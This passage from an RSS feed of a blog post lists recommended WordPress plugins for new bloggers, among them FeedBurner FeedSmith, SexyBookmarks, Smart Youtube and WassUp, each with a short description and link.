<p>5.<a href="http://www.feedburner.com/" target="_blank">FeedBurner FeedSmith </a>:-This plugin detects all ways to access your original WordPress feeds and redirects them to your FeedBurner feed so you can track every possible subscriber.</p>
<p>6<a href="http://wordpress.org/extend/plugins/sexybookmarks/" target="_blank">. SexyBookmarks </a>:- Sexybookmarks provide easier way to share your posr on the diffrent social media sites. Its CMS is really nice and attractive. You got diffrent option to Choose in the given CMS. Use this</p>
<p>7. <a href="http://wordpress.org/extend/plugins/smart-youtube/" target="_blank">Smart Youtube </a>:- Smart Youtube is a WordPress Youtube Plugin that allows you to easily insert Youtube videos/playlists in your post, comments and in RSS feed.The main purpose of the plugin is to correctly embed youtube videos into your blog post. The video will be shown in full in your RSS feed as well.From version 2.0 Smart youtube also supports playback of high quality videos, works on iPhone, produces xHTML valid code (unlike YouTube embed code), allows you to view videos in fullscreen and most recently supports YouTube playlists.The plugin is designed to be small and fast and not use any external resources. It has a number of customizable options.</p>
<p>8. <a href="http://wordpress.org/extend/plugins/wassup/">WassUp</a>:-Wordpress plugin to analyze your visitors traffic with real time stats, chart and a lot of chronological informations. It has sidebar Widget support to show current online visitors and other statistics. For WordPress 2.2 or higher.</p>
<p>9.<a href="http://wordpress.org/extend/plugins/wordpress-23-related-posts-plugin/">WordPress Related Posts</a>:- Generate a related posts list via tags of WordPress and aslo add feeds of the post, so it provide the more like stuff to your blog users.</p>
<p>10.<a href="http://mightyhitter.com/main-page/plugins/mightysearch" target="_blank"> Mighty Search</a>:- Create your onsite Google Search with wordpress.</p>
<p>There are many more but most important are given above, i am providing some more plugin that you can go through.</p>
<p>1. <a href="http://wordpress.org/extend/plugins/wp-facebookconnect/" target="_blank">Facebook Connect</a></p>
<p>2. <a href="http://wordpress.org/extend/plugins/tweetmeme/" target="_blank">TweetMeme or Retweet Me</a></p>
<p>3. <a href="http://www.fbshare.me/" target="_blank">Facebook Sharecount</a></p>
<p>4. <a href="http://wordpress.org/extend/plugins/register-plus/" target="_blank">RegisterPlus</a></p>
<p>5. <a href="http://wordpress.org/extend/plugins/myadmanager/" target="_blank">MyAddManager</a></p>
<p>Try these plugin also, these can help your work easier.</p>
<p>Say thanks to wordpress and the developers.</p>
<p>Share your Knowledge <img src='http://openhippo.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://openhippo.com/newbie-guide-important-plugin-for-wordpress-blogging/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
	</channel>
</rss>

